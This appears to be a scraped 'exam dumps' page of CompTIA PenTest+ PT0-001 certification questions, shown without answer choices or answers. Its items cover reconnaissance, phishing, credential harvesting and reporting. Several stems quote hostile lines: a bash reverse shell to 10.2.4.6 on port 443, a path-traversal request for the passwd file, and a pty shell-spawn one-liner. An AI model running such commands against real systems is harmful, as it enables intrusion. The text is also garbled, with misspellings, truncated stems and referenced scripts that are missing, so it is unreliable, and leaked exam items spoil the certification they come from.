Real CompTIA PenTest+ PT0-001 Exam Dumps

1. DRAG DROP

Performance based You are a penetration Inter reviewing a client’s website through a web browser.

Instructions: Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate source or cookies.

2. DRAG DROP

A manager calls upon a tester to assist with diagnosing an issue within the following Python script:

#!/usr/bin/python

s = “Administrator”

The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

3. DRAG DROP

Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once

4. HOTSPOT

Instructions: Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.

5. DRAG DROP

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script. Drag the appropriate elements into the correct locations to complete the script. If at any time you would like to bring back the initial state of the simulation, please click the reset

all button. During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

6. A constant wants to scan all the TCP Pots on an identified device.

Which of the following Nmap switches will complete this task?

7. A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

8. The following command is run on a Linux file system: Chmod 4111 /usr/bin/sudo

Which of the following issues may be exploited now?

9. A client is asking a penetration tester to evaluate a new web application for availability.

Which of the following types of attacks should the tester use?

10. During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.

Which of the following registry changes would allow for credential caching in memory?

11. In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

12. Which of the following would be BEST for performing passive reconnaissance on a target’s external domain?

13. If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8

Which of the following formats is the correct hash type?

14. A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack.

Which of the following remediation steps should be recommended? (Select THREE)

15. A software development team recently migrated to new application software on the on-premises environment Penetration test findings show that multiple vulnerabilities exist If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM.

Which of the following is MOST important for confirmation?

16. A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

http: www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd

Which of the following attack types is MOST likely to be the vulnerability?

17. An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses.

Which of the following commands can the assessor use to find any likely Windows domain controllers?

18. While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?

19. After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker’s actual fingerprint without exploitation.

Which of the following is the MOST likely explanation of what happened?

20. A penetration tester successfully exploits a DM2 server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device.

Which of the following are the BEST tools to use few this purpose? (Select TWO)

21. The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test.

Which of the following are the MOST likely causes for this difference? (Select TWO)

22. A penetration tester has successfully exploited an application vulnerability and wants to remove the command history from the Linux session.

Which of the following will accomplish this successfully?

23. When performing compliance-based assessments, which of the following is the MOST important Key consideration?

24. Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?

25. A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization.

Which of the following techniques would be the MOST appropriate? (Select TWO)

26. A penetration tester notices that the X-Frame-Optjons header on a web application is not set.

Which of the following would a malicious actor do to exploit this configuration setting?

27. A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect.

Which of the following would be the BEST step for the penetration tester to take?

28. A security consultant found a SCADA device in one of the VLANs in scope.

Which of the following actions would BEST create a potentially destructive outcome against device?

29. An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email.

Which of the following types of motivation was used m this attack?

30. A recently concluded penetration test revealed that a legacy web application is vulnerable lo SQL injection Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not m a position to risk the availability of the application Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Select TWO).

31. Which of the following is the reason why a penetration tester would run the chkconfig –del servicename command at the end of an engagement?

32. A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting “True”.

Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)

33. Given the following Python script:

Which of the following actions will it perform?

34. A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode.

Which of the following steps must the firm take before it can run a static code analyzer?

35. A penetration tester runs the following from a compromised box ‘python -c -import pty;Pty.sPawn( "/bin/bash").’

Which of the following actions is the tester taking?

36. A penetration tester has a full shell to a domain controller and wants to discover any user account

that has not authenticated to the domain in 21 days.

Which of the following commands would BEST accomplish this?

37. Given the following script:

Which of the following BEST describes the purpose of this script?

38. Which of the following has a direct and significant impact on the budget of the security assessment?

39. After performing a security assessment for a firm, the client was found to have been billed for the time the client’s test environment was unavailable. The client claims to have been billed unfairly.

Which of the following documents would MOST likely be able to provide guidance in such a situation?

40. During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful.

Which of the following would be the BEST target for continued exploitation efforts?

41. A client requests that a penetration tester emulate a help desk technician who was recently laid off.

Which of the following BEST describes the abilities of the threat actor?

42. Which of the following types of physical security attacks does a mantrap mitigate-?

43. A penetration tester wants to check manually if a “ghost” vulnerability exists in a system.

Which of the following methods is the correct way to validate the vulnerability?

44. Which of the following reasons does penetration tester needs to have a customer’s point-of ­contact information available at all time? (Select THREE).

45. While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

46. A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0> &1

Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

47. An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials.

Which of the following types of attacks is this an example of?

48. During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network.

Which of the following tools could be used to impersonate network resources and collect authentication requests?

49. A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline.

Which of the following should the penetration tester perform to verify compliance with the baseline?

50. A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s.

For which of the following types of attack would this information be used?

51. A penetration tester wants to target NETBIOS name service.

Which of the following is the most likely command to exploit the NETBIOS name service?

52. Joe, a penetration tester, is asked to assess a company’s physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site.

Which of the following would be MOST effective in accomplishing this?

53. A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets.

Which of following BEST describes the types of adversaries this would identify?

54. Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

55. After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees.

Which of the following is the BEST control to remediate the use of common dictionary terms?

56. A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information.

Which of the following is the MOST effective way to notify management of this finding and its importance?

57. A company planned for and secured the budget to hire a consultant to perform a web application penetration test.

Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:

– Code review

– Updates to firewall setting

58. A penetration tester locates a few unquoted service paths during an engagement.

Which of the following can the tester attempt to do with these?